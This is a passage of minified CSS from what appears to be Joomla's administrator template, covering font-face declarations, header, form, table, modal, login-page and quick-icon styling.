format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff) format("woff");font-weight:500;font-style:normal}@font-face{font-family:Roboto-Medium;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff) format("woff");font-weight:500;font-style:italic}@font-face{font-family:Roboto-MediumItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff) format("woff");font-weight:700;font-style:normal}@font-face{font-family:Roboto-Bold;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff) format("woff");font-weight:700;font-style:italic}@font-face{font-family:Roboto-BoldItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff) format("woff");font-weight:900;font-style:normal}@font-face{font-family:Roboto-Black;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff) format("woff")}@font-face{font-family:Roboto;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff) format("woff");font-weight:900;font-style:italic}@font-face{font-family:Roboto-BlackItalic;src:url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff2) format("woff2"),url(../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff) format("woff")}html{height:100%}html.a11y_font{font-size:18px}body{display:flex;flex-direction:column;min-height:100%;padding:0;margin:0;text-align:start}body.admin{background-color:var(--template-bg-dark-5)}body.monochrome{-webkit-filter:grayscale(1);filter:grayscale(1)}body.monochrome:after{position:fixed;top:0;left:0;z-index:-1;width:100%;height:100%;content:"";background:var(--template-bg-dark-5)}body.a11y_contrast{-webkit-filter:contrast(115%);filter:contrast(115%)}body.monochrome.a11y_contrast{-webkit-filter:grayscale(1) contrast(115%);filter:grayscale(1) contrast(115%)}body.a11y_highlight .header-item-content,body.a11y_highlight a{padding:3px;text-decoration:underline!important;border:1px dotted red}body.a11y_highlight .joomlaversion{padding:0;text-decoration:none!important;border:none}body.a11y_highlight a.page-link{padding:.375rem .75rem}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{font-weight:700}.h1,h1{font-weight:400}.small,small{font-size:.8rem}legend{font-size:1.2rem;font-weight:700}.js-focus-visible :focus:not(.focus-visible){outline:none}a.focus-visible,button.focus-visible,input.focus-visible,textarea.focus-visible{outline:auto 2px var(--focus)}.break-word{word-break:break-all;word-wrap:break-word}caption,label{font-size:1rem;text-align:start}.logo img path{fill:var(--template-text-dark)}.container-main,.system-debug{padding-bottom:50px}body .container-main{order:1;position:relative;padding-right:0;padding-left:0}.content{padding:1rem}@media (min-width:768px){.content{padding:0 2rem}.subhead+.content{padding-top:0}}body:not(.contentpane) .main-card{background:#fff;border-radius:.25rem;box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.row-selected{background-color:var(--toolbar-bg)}.chzn-container-single{width:auto!important}.input-group input{min-width:220px}.item-associations{padding:0}.item-associations li{display:inline-block;margin-bottom:3px;list-style:none}.message-alert{text-align:end!important}a[target=_blank]:before{-webkit-padding-end:3px;padding-inline-end:3px;font-family:Font Awesome\ 5 Free;font-size:14px;font-weight:900;content:""}@media (max-width:575.98px){#wrapper.d-flex{display:block!important}}.text-muted{color:var(--template-text-dark)!important;opacity:.7}.card-columns{display:grid;grid-gap:0 15px;grid-template-columns:1fr}@media (min-width:768px){.card-columns{grid-template-columns:1fr 1fr}}@media (min-width:768px){.cpanel-help .card-columns,.cpanel-system .card-columns{grid-template-columns:1fr 1fr 1fr}}.tiny{font-size:.6rem;line-height:1.4rem}details{padding:.5rem 1rem;margin:0 0 2rem;background:var(--template-bg-dark-3);border:1px solid var(--template-bg-dark-10);border-radius:.25rem}details summary{color:var(--template-link-color)}details summary~*{margin-top:1rem}meter{width:100%}@media (min-width:768px){joomla-tab[orientation=horizontal]:not([view=accordion]) section>.row{--gutter-x:4rem}joomla-tab[orientation=horizontal]:not([view=accordion]) section>.row>*+*{-webkit-border-start:1px solid var(--template-bg-dark-10);border-inline-start:1px solid var(--template-bg-dark-10)}}.minicolors-theme-bootstrap .minicolors-swatch{width:36px;height:36px}.minicolors-theme-bootstrap .minicolors-swatch>.minicolors-sprite{top:50%;left:8px;border-radius:0;-webkit-transform:translateY(-50%);transform:translateY(-50%)}span.minicolors-swatch-color{cursor:pointer}@media (max-width:767.98px){.badge{white-space:normal}}.badge.bg-secondary:hover{color:#fff}.btn{transition:none}@media (max-width:575.98px){.btn{margin-bottom:.25rem}.input-group .btn{margin-bottom:0}}.btn-primary{color:var(--template-text-light);background-color:var(--template-bg-dark-60);border-color:var(--template-bg-dark-60)}.btn-primary:active,.btn-primary:focus,.btn-primary:hover{background-color:var(--template-bg-dark-70);border-color:var(--template-bg-dark-90)}.btn-primary:not(:disabled):not(.disabled).active,.btn-primary:not(:disabled):not(.disabled):active,.show>.btn-primary.dropdown-toggle{background-color:var(--template-bg-dark);border-color:var(--template-bg-dark)}.btn-secondary{background-color:var(--template-bg-dark-60);border-color:var(--template-bg-dark-60)}.input-group-text{background-color:var(--template-bg-dark);border-color:var(--template-bg-dark)}.card-columns .card{margin-bottom:1rem}@media (min-width:576px){.card-columns{-webkit-column-count:3;-moz-column-count:3;column-count:3;-webkit-column-gap:1.25rem;-moz-column-gap:1.25rem;column-gap:1.25rem;orphans:1;widows:1}.card-columns .card{display:inline-block;width:100%}}.content .card{box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.content .card-header{display:flex;padding:1rem 1rem .75rem;font-weight:700;color:var(--template-bg-dark);background:var(--card-bg)}.content .card-header>[class^=icon-],.content .card-header>img{-webkit-margin-end:.5rem;margin-inline-end:.5rem}.custom-select,.form-select{max-width:100%;cursor:pointer;background:url(../images/select-bg.svg) no-repeat 100%/116rem;background-color:var(--template-bg-light);border:1px solid var(--template-bg-dark-20)}[dir=rtl] .custom-select,[dir=rtl] .form-select{padding:.5rem 1rem .5rem 4rem;background:url(../images/select-bg-rtl.svg) no-repeat 0/116rem;background-color:var(--template-bg-light)}.form-select[multiple],[multiple].custom-select{padding:0;background-color:var(--white-offset)}.form-select[multiple] option,[multiple].custom-select option{padding:.3rem 1rem;background-color:var(--white-offset)}.form-select[multiple] option:checked,[multiple].custom-select option:checked{color:var(--template-text-light);background-color:var(--template-bg-dark)!important}.custom-select-success.custom-select,.form-select-success.custom-select,.form-select.custom-select-success,.form-select.form-select-success{color:var(--success);background-color:var(--success);border-color:var(--success)}.custom-select-success.custom-select option,.form-select-success.custom-select option,.form-select.custom-select-success option,.form-select.form-select-success option{color:var(--template-text-dark);background-color:var(--white-offset)}.custom-select-danger.custom-select,.form-select-danger.custom-select,.form-select.custom-select-danger,.form-select.form-select-danger{color:var(--danger);background-color:var(--danger);border-color:var(--danger)}.custom-select-danger.custom-select option,.form-select-danger.custom-select option,.form-select.custom-select-danger option,.form-select.form-select-danger option{color:var(--template-text-dark);background-color:var(--white-offset)}.custom-select:focus,.form-select:focus{border-color:#39f;box-shadow:0 0 0 .2rem #eaeaea}.custom-select:disabled,.form-select:disabled{cursor:default;background:#e8e8e8;border:0;box-shadow:none}.custom-select optgroup,.custom-select option,.form-select optgroup,.form-select option{color:var(--template-text-dark);background-color:#fff}.accordion .card-header{display:block;font-size:.9286rem;font-weight:700;line-height:1.2}.accordion .list-group-item{color:var(--template-link-color)}.btn-group .dropdown-menu{min-width:100%;background:#fff;box-shadow:0 1px 1px rgba(0,0,0,.15)}.btn-group .dropdown-menu joomla-toolbar-button{text-align:start;border:0}.dropdown-menu{box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.dropdown-item{text-align:start;border-bottom:1px solid rgba(0,0,0,.1)}.btn-primary+.dropdown-menu .dropdown-item:focus,.btn-primary+.dropdown-menu .dropdown-item:hover{background-color:var(--template-bg-dark)}.btn-secondary+.dropdown-menu .dropdown-item:focus,.btn-secondary+.dropdown-menu .dropdown-item:hover{color:var(--template-text-light);background-color:var(--secondary)}.btn-danger+.dropdown-menu .dropdown-item:focus,.btn-danger+.dropdown-menu .dropdown-item:hover{background-color:var(--danger)}.btn-info+.dropdown-menu .dropdown-item:focus,.btn-info+.dropdown-menu .dropdown-item:hover{background-color:var(--info)}.dropdown-status-group .dropdown-menu .dropdown-item:focus:not(.disabled),.dropdown-status-group .dropdown-menu .dropdown-item:hover:not(.disabled){color:var(--template-text-light);background-color:var(--template-bg-dark)}.dropdown-save-group .dropdown-menu .dropdown-item:focus:not(.disabled),.dropdown-save-group .dropdown-menu .dropdown-item:hover:not(.disabled){color:var(--template-text-light);background-color:var(--success)}.dropdown-item+.dropdown-item{border-top:1px solid rgba(0,0,0,.1)}.dropdown-status-group .dropdown-menu .dropdown-item:not(.disabled){color:var(--action)}.dropdown-save-group .dropdown-menu .dropdown-item:not(.disabled){color:var(--success)}.dropdown-item.first:not(.last){border-bottom-right-radius:0;border-bottom-left-radius:0}.dropdown-item.last:not(.first){border-top-left-radius:0;border-top-right-radius:0}.dropdown-item:not(.first):not(.last):not(:only-of-type){border-radius:0}label{margin-bottom:0}legend{margin-bottom:1.1rem;font-size:1rem;font-weight:400}[aria-grabbed=true]{box-shadow:0 0 2px 1px var(--template-bg-dark)}select.form-control{background-color:var(--template-bg-light)}.field-media-wrapper{display:block;width:100%;max-width:calc(50vw - 5rem)}.field-media-wrapper .field-media-preview{width:100%;max-width:none}.field-media-wrapper .button-select{background-color:#366342}.field-media-wrapper .button-clear{background-color:#a32120}.field-media-wrapper .button-clear>.fa-check,.field-media-wrapper .button-select>.fa-times{color:#f8f9fa}@media (max-width:991.98px){.field-media-wrapper{min-width:100%}}.form-inline .custom-select,.form-inline .form-control,.form-inline .form-select{display:inline-block;width:auto}@media (max-width:767.98px){.form-inline .custom-select,.form-inline .form-control,.form-inline .form-select{width:100%}}.list-group-item{background-color:var(--white-offset)}.list-unstyled .list-unstyled{padding-left:20px}.jviewport-height10{height:10vh}.jviewport-height20{height:20vh}.jviewport-height30{height:30vh}.jviewport-height40{height:40vh}.jviewport-height50{height:50vh}.jviewport-height60{height:60vh}.jviewport-height70{height:70vh}.jviewport-height80{height:80vh}.jviewport-height90{height:90vh}.jviewport-height100{height:100vh}[class*=jviewport-height] iframe{height:100%}.modal-dialog.jviewport-width10{width:10vw}.modal-dialog.jviewport-width20{width:20vw;max-width:none}.modal-dialog.jviewport-width30{width:30vw;max-width:none}.modal-dialog.jviewport-width40{width:40vw;max-width:none}.modal-dialog.jviewport-width50{width:50vw;max-width:none}.modal-dialog.jviewport-width60{width:60vw;max-width:none}.modal-dialog.jviewport-width70{width:70vw;max-width:none}.modal-dialog.jviewport-width80{width:80vw;max-width:none}.modal-dialog.jviewport-width90{width:90vw;max-width:none}.modal-dialog.jviewport-width100{width:100vw;max-width:none}@media (max-width:767.98px){.modal-dialog{margin:1.75rem auto}}.modal-dialog .modal-body{padding:0}.pagination{margin:1rem}th{text-align:inherit;text-align:-webkit-match-parent}.table thead th{font-size:1rem}.table thead td,.table thead th{white-space:nowrap}.sysinfo .table thead td,.sysinfo .table thead th{white-space:normal}.table thead a{color:var(--template-link-color)}.table thead a#sorted{font-weight:500;color:#343a40}@media (max-width:767.98px){.table thead .actions,.table thead .actions-th1{width:28%}}.table tbody tr:active,.table tbody tr:focus,.table tbody tr:hover{background-color:rgba(0,0,0,.075)}.table tbody tr:last-of-type td,.table tbody tr:last-of-type th{border-bottom:0}.table tbody .itemnumber a.btn,.table tbody .itemnumber span.btn{padding:.1rem .5rem;text-decoration:none}.table tbody th{font-weight:500}.table tbody a:not(.badge){text-decoration:underline}.table td label,.table th label{margin-bottom:0}.table td .inactive [class*=" fa-"],.table td .inactive [class*=" icon-"],.table td .inactive [class^=fa-],.table td .inactive [class^=icon-],.table th .inactive [class*=" fa-"],.table th .inactive [class*=" icon-"],.table th .inactive [class^=fa-],.table th .inactive [class^=icon-]{color:#cdcdcd}.j-main-container>.table{box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.alert{margin:1rem 0;border-right:0;border-left:0;border-radius:.2rem}.alert.alert-info{color:var(--template-bg-dark);background-color:var(--template-bg-dark-10);border:1px solid var(--template-bg-dark-20)}.alert.alert-warning{color:#996900;background-color:#fffcf4;border:1px solid #ffb514}.alert.alert-success{color:#457d54;background-color:#f2f8f4;border:1px solid hsl(var(--hue),50%,93%)}.alert.alert-error{color:#c52827;background-color:#fef8f8;border:1px solid #c52827}.alert-parent{margin-top:0}fieldset .alert.alert-info{margin:-1rem 0 1rem}.alert-heading{font-size:1rem}@-webkit-keyframes fadeIn{0%{opacity:0;-webkit-transform:translateY(-15px);transform:translateY(-15px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeIn{0%{opacity:0;-webkit-transform:translateY(-15px);transform:translateY(-15px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}.title-alias .form-control{max-width:100%}.title-alias .form-control-feedback{position:absolute;right:1rem;bottom:-1.8rem;text-align:right}.layout-edit .title-alias .form-group{box-shadow:none}.header{z-index:1020;color:#fff;background:var(--template-bg-dark)}.header-inside{display:flex;min-height:54px}.header a{color:#fff}.header a:before{display:none}.header .logo{display:flex;flex-flow:row nowrap;align-items:center;width:18rem;height:100%;padding:12px 5px;overflow:hidden;background-color:var(--template-bg-dark-70);transition:all .3s ease-in-out}.header .logo.small{width:3rem;transition:all .3s ease-in-out}.header .logo.small img:not(.logo-collapsed),.header .logo.small svg:not(.logo-collapsed){display:none}.header .logo.small img.logo-collapsed,.header .logo.small svg.logo-collapsed{display:inline-block;width:20px;height:20px;-o-object-fit:contain;object-fit:contain;-o-object-position:center center;object-position:center center}.header .logo img,.header .logo svg{width:150px;height:30px;margin:0 .35rem;-o-object-fit:contain;object-fit:contain;-o-object-position:left center;object-position:left center}[dir=rtl] .header .logo img,[dir=rtl] .header .logo svg{-o-object-position:right center;object-position:right center}.header .logo img.logo-collapsed,.header .logo svg.logo-collapsed{display:none}.header .page-title{padding:0 1rem;margin:0;overflow:hidden;font-size:1.2rem;color:#fff;text-overflow:ellipsis;white-space:nowrap}.header .page-title>span{-webkit-margin-end:.25rem;margin-inline-end:.25rem}.header .dropdown-menu{font-size:.85rem}.header .dropdown-header,.header .dropdown-item{padding:.82rem .75rem;color:#fff;background-color:var(--template-bg-dark-70)}.header .dropdown-header>span,.header .dropdown-item>span{-webkit-margin-end:.5rem;margin-inline-end:.5rem}.header .dropdown-header,.header .dropdown-header:hover,.header .dropdown-item:hover{background-color:var(--template-bg-dark)}.header .dropdown-header{padding:.75rem;font-size:inherit}.header-items{align-items:center;justify-content:flex-end;width:50%;margin:15px;-webkit-margin-start:auto;margin-inline-start:auto}.header-items .dropdown-toggle{background-color:transparent;border:0}.header-items .dropdown-toggle:after{display:none}.header-item{position:relative;margin:0 4px}.header-item-content{display:flex;align-items:center;line-height:1rem;color:#fff;background-color:var(--template-bg-dark-60);border-radius:22px;-webkit-padding-end:4px;padding-inline-end:4px}.header-item-content a,.header-item-content button{color:#fff;text-decoration:none}.header-item-content a{display:flex}.header-item-content:not(.no-link):not(.joomlaversion):hover{background-color:var(--template-bg-dark-50)}.header-item-content.joomlaversion{color:var(--bluegray);background-color:transparent}.header-item-content.joomlaversion .header-item-text{-webkit-padding-end:12px;padding-inline-end:12px}.header-item-icon>*{display:flex;align-items:center;justify-content:center;width:28px;min-width:28px;height:28px;margin:4px;color:#fff;background-color:var(--template-bg-dark);border-radius:16px}.header-item-icon span{margin:4px}.header-item-count{-webkit-margin-end:.5rem;margin-inline-end:.5rem}.header-item-text{padding:0 8px 0 4px;font-size:.75rem;white-space:nowrap}.header-more-btn{margin:0 5px;font-size:1.7rem}.header-dd-items .header-item-content{background:transparent}.header-dd-items .header-item-text{font-size:.75rem}.header-dd-items .dropdown-item{padding:.5rem .75rem}.header-dd-item{padding:3px 6px}@media (max-width:767.98px){.header-items{position:fixed;bottom:0;flex-direction:row-reverse;width:100%;padding:10px 0;margin:0;background:var(--template-bg-dark)}.header-items .fa-angle-down,.header-items .icon-angle-down{-webkit-transform:rotate(180deg);transform:rotate(180deg)}.header-item-more.active .header-more-menu{left:0}[dir=rtl] .header-item-more.active .header-more-menu{right:0;left:auto}.header-item-more .header-item-content{background:transparent}.header-more-menu{top:auto;bottom:100%}}.form-control{max-width:100%;background-color:#fff;border:1px solid var(--template-bg-dark-20);border-radius:.25rem}.form-control:focus{border-color:#39f;box-shadow:0 0 0 .2rem #eaeaea}.control-group{position:relative;display:flex;flex-wrap:wrap;margin:0 0 1rem}.control-group>.form-check{display:inline-block}.control-group:after{display:table;clear:both;content:""}.control-group .control-label{width:240px;padding:.3rem 1rem .3rem 0}.control-group .controls{position:relative;flex:1;min-width:210px}.control-group .controls+div{width:100%;margin:5px 0 10px}.form-vertical .control-group{flex-direction:column}.spacer hr{width:380px}.spacer label{width:440px}td .form-control{display:inline-block;width:auto}.checkboxes{padding-top:5px}.checkboxes .checkbox input{position:static;margin-left:0}.form-check{padding-top:5px;margin-bottom:0}.modal label{width:100%}.invalid{color:var(--danger);border-color:var(--danger)}.valid{border-color:var(--success)}.form-control-feedback{display:block}[aria-grabbed=true]{box-shadow:inset 0 0 0 .1rem #e9e9e9}.sortable-handler.inactive{opacity:.3}[role=tooltip]:not(.show){z-index:1070;display:none;padding:.5em;margin:.25em;color:#fff;text-align:start;background:#000;border-radius:.2rem!important}:focus+[role=tooltip],:hover+[role=tooltip]{position:absolute;display:block}[id="filter[search]-desc"]{bottom:100%}.container-popup [id="filter[search]-desc"]{top:100%;bottom:auto}.input-group>.form-control[readonly]{margin-right:1px}div.subform-repeatable-group{position:relative;padding:32px 32px 16px 28px;margin-top:20px;border:1px solid var(--template-bg-dark-20);border-radius:.25rem}div.subform-repeatable-group>.btn-toolbar .btn-group{position:static}div.subform-repeatable-group>.btn-toolbar .btn{position:absolute}div.subform-repeatable-group>.btn-toolbar .btn.group-add{right:-1px;bottom:-1px;border-radius:.25rem 0 .25rem 0}div.subform-repeatable-group>.btn-toolbar .btn.group-remove{top:-1px;right:-1px;border-radius:0 .25rem 0 .25rem}div.subform-repeatable-group>.btn-toolbar .btn.group-move{top:50%;right:100%;margin-top:-27px;line-height:52px;border-radius:.25rem 0 0 .25rem}.subform-repeatable-group[draggable=true],.subform-repeatable-group[draggable=true]>td{background-color:#20c997}.icon-white{color:#fff}.tbody-icon{padding:0 3px;text-align:center;background-color:transparent;border:0}.tbody-icon [class*=" fa-"],.tbody-icon [class*=" icon-"],.tbody-icon [class^=fa-],.tbody-icon [class^=icon-]{width:26px;height:26px;font-size:1rem;line-height:22px;color:#cdcdcd;border:2px solid var(--border);border-radius:50%}.tbody-icon .fa-check,.tbody-icon .icon-check,.tbody-icon .icon-publish{color:var(--success);border-color:var(--success)}.tbody-icon .fa-star.featured,.tbody-icon .icon-color-featured,.tbody-icon .icon-home,.tbody-icon .icon-star.featured{color:#ffb514;border-color:#ffb514}.tbody-icon .fa-folder,.tbody-icon .icon-archive,.tbody-icon .icon-folder{color:var(--template-text-dark);border-color:#495057}.tbody-icon .fa-lock,.tbody-icon .icon-checkedout,.tbody-icon .icon-lock{width:auto;height:auto;font-size:1.2rem;line-height:1rem;color:var(--template-text-dark);border:0}.tbody-icon.color-featured-disabled,.tbody-icon.fa-star-disabled,.tbody-icon.featured-disabled,.tbody-icon.home-disabled,.tbody-icon.icon-star-disabled{cursor:not-allowed;opacity:1}.tbody-icon.disabled .fa-home,.tbody-icon.disabled .icon-home{color:#fffcf4;border-color:#fffcf4}.plg_system_webauthn_login_button svg{-webkit-margin-end:2px;margin-inline-end:2px}.plg_system_webauthn_login_button svg path{fill:var(--white)}.badge>span{-webkit-margin-end:.5rem;margin-inline-end:.5rem}iframe{border:0}.modal iframe{width:100%}.options-form{width:100%;padding:1vw 2vw;margin-bottom:1rem;color:var(--template-text-dark);border:1px solid var(--template-bg-dark-20)}.options-form>legend{float:none;width:auto;padding:0 1rem;font-weight:700;color:var(--template-text-dark);background-color:#fff}.task-logout .container-main,.view-login .container-main{order:1}@media (max-width:767.98px){.task-logout .container-main,.view-login .container-main{display:flex;flex-wrap:wrap;align-items:center;justify-content:center;min-height:65vh}}@media (max-width:767.98px){.task-logout .container-main #content,.view-login .container-main #content{max-width:98%;padding:0}}.task-logout .login,.view-login .login{width:100%;max-width:25rem;padding:30px;margin:1rem;color:var(--template-text-dark);background:var(--white);border-radius:10px;box-shadow:0 4px 20px -10px var(--template-bg-dark-50)}@media (max-width:991.98px){.task-logout .login,.view-login .login{margin-bottom:3rem}}.task-logout .login img,.view-login .login img{max-height:4.4rem}.task-logout .login .logo,.view-login .login .logo{padding:0 20px 20px}.task-logout .login svg.joomla-logo,.view-login .login svg.joomla-logo{width:2.4rem;height:4.4rem;background-size:4.4rem 2.4rem}.task-logout .login svg.joomla-logo path,.view-login .login svg.joomla-logo path{fill:var(--template-bg-dark)}.task-logout .login-watermark,.view-login .login-watermark{position:absolute;z-index:-1;max-width:500px;-webkit-transform:rotate(12deg) translate(40%,10%);transform:rotate(12deg) translate(40%,10%)}.task-logout .form-group,.view-login .form-group{position:relative;margin-bottom:1.85rem}.task-logout .form-group label span,.view-login .form-group label span{font-size:.9rem}@media (max-width:575.98px){.task-logout .form-group label span,.view-login .form-group label span{width:100%}}.task-logout .form-group label span.text-end,.view-login .form-group label span.text-end{font-size:.75rem;color:var(--template-special-color)}.task-logout .form-group .form-control-feedback,.view-login .form-group .form-control-feedback{position:absolute;right:0;bottom:-1.5rem;font-size:.75rem;text-align:right}[dir=rtl] .task-logout .form-group .form-control-feedback,[dir=rtl] .view-login .form-group .form-control-feedback{right:auto;left:0;text-align:left}.task-logout .form-group .form-control-hint,.view-login .form-group .form-control-hint{position:absolute;top:.1rem;right:0;font-size:.75rem;text-align:right}[dir=rtl] .task-logout .form-group .form-control-hint,[dir=rtl] .view-login .form-group .form-control-hint{right:auto;left:0;text-align:left}.task-logout input:focus,.task-logout select:focus,.view-login input:focus,.view-login select:focus{background:#fff;box-shadow:inset 0 0 1px 1px var(--template-contrast)}.task-logout .h1,.task-logout h1,.view-login .h1,.view-login h1{margin-bottom:.25rem;color:#fff;text-align:center}.task-logout .h2,.task-logout h2,.view-login .h2,.view-login h2{font-weight:400;color:var(--template-bg-dark-10)}@media (max-width:575.98px){.task-logout .btn,.view-login .btn{padding:8px 10px;font-size:.875rem}}.task-logout .custom-select,.task-logout .form-control,.task-logout .form-select,.view-login .custom-select,.view-login .form-control,.view-login .form-select{max-width:none}.task-logout .header .logo,.task-logout .sidebar-wrapper,.view-login .header .logo,.view-login .sidebar-wrapper{flex:1 0 400px}.task-logout .sidebar-wrapper,.view-login .sidebar-wrapper{display:flex;flex-direction:column;max-width:none;background-color:var(--template-sidebar-bg)}@media (max-width:767.98px){.task-logout .sidebar-wrapper,.view-login .sidebar-wrapper{order:2;margin-bottom:3rem}}.task-logout .sidebar-wrapper .main-brand,.view-login .sidebar-wrapper .main-brand{margin-bottom:auto}.task-logout .sidebar-wrapper .main-brand a,.view-login .sidebar-wrapper .main-brand a{font-size:.875rem}.task-logout .sidebar-wrapper .card-header,.view-login .sidebar-wrapper .card-header{font-size:1.125rem;color:#fff}.task-logout #sidebar,.view-login #sidebar{align-self:flex-end;width:100%;font-size:.875rem;color:var(--template-text-light);text-align:center}.task-logout #sidebar .card,.view-login #sidebar .card{background:rgba(0,0,0,.1);box-shadow:none}.task-logout #sidebar .card .module-body,.view-login #sidebar .card .module-body{padding:.75rem 1.25rem}@media (max-width:767.98px){.task-logout #sidebar,.view-login #sidebar{position:relative;bottom:0}}@media (max-width:767.98px){.task-logout .container-main,.task-logout .sidebar-wrapper,.view-login .container-main,.view-login .sidebar-wrapper{flex:1 0 100%!important;max-width:100%!important;min-height:auto}}.task-logout .wrapper,.view-login .wrapper{display:flex}@media (max-width:767.98px){.task-logout .wrapper,.view-login .wrapper{flex-direction:column}}.task-logout .header,.view-login .header{display:flex}.task-logout .header .logo.small,.view-login .header .logo.small{line-height:2.5rem}@media (max-width:767.98px){.task-logout .header,.view-login .header{background:var(--template-bg-dark-70)}}label{color:#132f53}.com_login .sidebar-wrapper .main-brand{flex:1;flex-basis:auto;margin-top:100px;text-align:center}@media (max-width:767.98px){.com_login .sidebar-wrapper .main-brand{margin-top:10px}}.com_login .sidebar-wrapper #sidebar p{margin-bottom:.2rem}.com_login .sidebar-wrapper #sidebar,.com_login .sidebar-wrapper #sidebar a,.com_login .sidebar-wrapper .main-brand a{color:var(--template-text-light)}@media (max-width:767.98px){.view-login #wrapper.d-flex{display:flex!important}}@media (max-width:767.98px){.view-login #sidebar-wrapper:not(.show):not(.collapse){display:block}}.view-login .invalid .form-control-feedback{color:var(--danger)}.ie11{display:none}@media (-ms-high-contrast:active),(-ms-high-contrast:none){.ie11{display:block}}.login_message{margin:1rem 1rem 0}.modal .btn{padding:0 22px;-webkit-margin-end:.5rem;margin-inline-end:.5rem;font-size:1rem;line-height:2.3rem;color:var(--template-text-dark);background:var(--white);border-color:var(--whiteoffset);box-shadow:1px 1px 1px 0 rgba(0,0,0,.25)}.modal .btn-danger:not([href]),.modal .btn-primary:not([href]),.modal .btn-secondary:not([href]),.modal .btn-success:not([href]){color:var(--template-text-dark);background:var(--white);border:1px solid var(--template-text-dark)}.modal .btn-primary:not([href]):hover{color:var(--white);background:var(--primary);border-color:var(--primary)}.modal .btn-secondary:not([href]):hover{color:var(--white);background:var(--secondary);border-color:var(--secondary)}.modal .btn-success:not([href]):hover{color:var(--white);background:var(--success);border-color:var(--success)}.modal .btn-danger:not([href]):hover{color:var(--white);background:var(--danger);border-color:var(--danger)}.modal .btn.btn-danger [class*=" fa-"],.modal .btn.btn-danger [class*=" icon-"],.modal .btn.btn-danger [class^=fa-],.modal .btn.btn-danger [class^=icon-],.modal .btn.btn-danger span{display:inline-block;width:2.375rem;height:100%;margin:0 16px;-webkit-margin-start:-22px;margin-inline-start:-22px;line-height:2.375rem;color:hsla(0,0%,100%,.9);background-color:var(--danger)}.modal .btn.btn-success [class*=" fa-"],.modal .btn.btn-success [class*=" icon-"],.modal .btn.btn-success [class^=fa-],.modal .btn.btn-success [class^=icon-],.modal .btn.btn-success span{display:inline-block;width:2.375rem;height:100%;margin:0 16px;-webkit-margin-start:-22px;margin-inline-start:-22px;line-height:2.375rem;color:hsla(0,0%,100%,.9);background-color:var(--success)}.modal-header{padding:0 15px}.modal-body{overflow-y:initial}.modal-title{font-weight:400;line-height:2.875rem}.contentpane{padding:20px}.changelog{text-align:start!important}.changelog__item{display:flex;border-bottom:1px solid #dee2e6}@media (max-width:767.98px){.changelog__item{flex-direction:column}}.changelog__tag{flex:1 0 180px;max-width:180px;padding:10px 15px;text-align:end;background:#f1f3f5;border-right:1px solid #dee2e6}.changelog__tag .badge{border-radius:.2rem}.changelog__tag .badge.badge-jlanguage{background-color:#fff}@media (max-width:767.98px){.changelog__tag{flex:1 0 auto;max-width:100%;text-align:left;border-right:0;border-bottom:1px solid #dee2e6}}.changelog__list{padding:10px 15px}.changelog__list ul{-webkit-padding-start:15px;padding-inline-start:15px;margin-bottom:0}.changelog__list li{margin-bottom:.15rem}.changelog__list li:last-of-type{margin-bottom:0}.quick-icons{background-color:#fff}.quick-icons .nav{display:grid;grid-template-columns:repeat(auto-fit,minmax(190px,1fr));grid-gap:1rem}.quick-icons a{text-decoration:none}.quick-icons ul{padding:0}.quick-icons .quickicon{--text-color:hsl(var(--hue),30%,40%);--bg-color:hsl(var(--hue),60%,97%);--icon-color:hsl(var(--hue),30%,40%);--bg-color-hvr:var(--template-bg-dark);display:flex;flex-grow:1}.quick-icons .quickicon a{display:flex;flex-direction:column;flex-grow:1;justify-content:flex-end;padding:0 1rem;color:var(--text-color);background-color:var(--bg-color);transition:all .25s ease}.quick-icons .quickicon a .quickicon-icon{margin-top:.5rem;-webkit-margin-start:.2rem;margin-inline-start:.2rem}.quick-icons .quickicon a .quickicon-icon>*{font-size:2rem;color:var(--icon-color)}.quick-icons .quickicon a .quickicon-name{padding:.125rem 0 .6rem;font-size:.875rem;font-weight:700}.quick-icons .quickicon a 